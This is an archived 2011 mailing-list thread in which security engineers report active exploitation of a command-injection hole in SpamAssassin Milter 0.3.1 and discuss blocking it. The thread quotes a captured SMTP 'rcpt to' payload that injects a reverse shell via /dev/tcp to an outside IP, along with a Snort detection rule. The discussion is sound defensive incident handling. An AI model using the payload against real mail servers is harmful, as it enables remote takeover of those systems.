spamass-milt-list
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Rem


From: Adam Katz
Subject: Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
Date: Thu, 10 Feb 2011 12:37:59 -0800
User-agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101213 Lightning/1.0b2 Icedove/3.1.7

I'm subscribed under a different address between these lists, so my
cross-post to this list failed.  Post attached.
--- Begin Message --- Subject: Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt Date: Thu, 10 Feb 2011 12:14:59 -0800 User-agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101213 Lightning/1.0b2 Icedove/3.1.7
Copying the spamass-milter mailing list.

On 02/10/2011 09:42 AM, Michael Scheidell wrote:
>> if case you are using spamassassin milter:
>> 
>> active exploits going on.
>> 
>> <http://seclists.org/fulldisclosure/2010/Mar/140>
>> <http://www.securityfocus.com/bid/38578>
>> 
>> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
>> 
>> I don't see anything on bugtraq about a fix.

On 02/10/2011 10:21 AM, David F. Skoll wrote:
> Aieee.... popen() in security-sensitive software!??!??
> 
> Also, why does the milter process run as root?  That seems like a huge
> hole all by itself.


Does this affect sendmail as well as postfix?  I assume so, but wanted
an explicit confirmation.  (I am no longer managing an environment that
uses this milter and therefore cannot verify myself.)
--- Begin Message --- Subject: Fwd: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt Date: Thu, 10 Feb 2011 12:42:40 -0500 User-agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.13) Gecko/20101207 Thunderbird/3.1.7
heads up:

if case you are using spamassassin milter:

active exploits going on.

<http://seclists.org/fulldisclosure/2010/Mar/140>
<http://www.securityfocus.com/bid/38578>

Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1

I don't see anything on bugtraq about a fix.


-------- Original Message --------
Subject: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt










The rule is only looking for this:

content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";

 

Personally, I would probably block it.  Although, if we’re not seeing this sort of thing pop up on customer’s boxes, a manual block in scanner2 is sufficient for now, right?

 

Either way, let me know and I’ll block/unblock/leave alone.

 

 

--

John Meyer

Associate Security Engineer

>|SECNAP Network Security

Office: (561) 999-5000 x:1235

Direct: (561) 948-2264

 

From: Michael Scheidell
Sent: Thursday, February 10, 2011 12:25 PM
To: John Meyer
Cc: Jonathan Scheidell; Anthony Wetula
Subject: Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

 

is the snort rule specific enough that you can block the offending ip for 5 mins?

(if its a real smtp server, it will retry) and legit email through.



On 2/10/11 12:12 PM, John Meyer wrote:

I don’t like the looks of this.  I blocked that IP with samtool.

 

Payload:

 

rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"

data

.

quit

 

 

 

--

John Meyer

Associate Security Engineer

>|SECNAP Network Security

Office: (561) 999-5000 x:1235

Direct: (561) 948-2264

 

From: SECNAP Network Security
Sent: Thursday, February 10, 2011 12:01 PM
To: address@hidden
Subject: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

 

02/10-12:00:59 <trust1> TCP 62.206.228.188:56691 --> 10.70.1.33:25
[1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
[Classification: Attempted User Privilege Gain] [Priority: 1]

 

--
Michael Scheidell, CTO
o: 561-999-5000
d: 561-948-2259
ISN: 1259*1300
> | SECNAP Network Security Corporation

·         Certified SNORT Integrator

·         2008-9 Hot Company Award Winner, World Executive Alliance

·         Five-Star Partner Program 2009, VARBusiness

·         Best in Email Security,2010: Network Products Guide

·         King of Spam Filters, SC Magazine 2008



This email has been scanned and certified safe by SpammerTrap®.
For Information please see http://www.secnap.com/products/spammertrap/




--- End Message ---

Attachment: signature.asc
Description: OpenPGP digital signature


--- End Message ---

Attachment: signature.asc
Description: OpenPGP digital signature


reply via email to

[Prev in Thread] Current Thread [Next in Thread]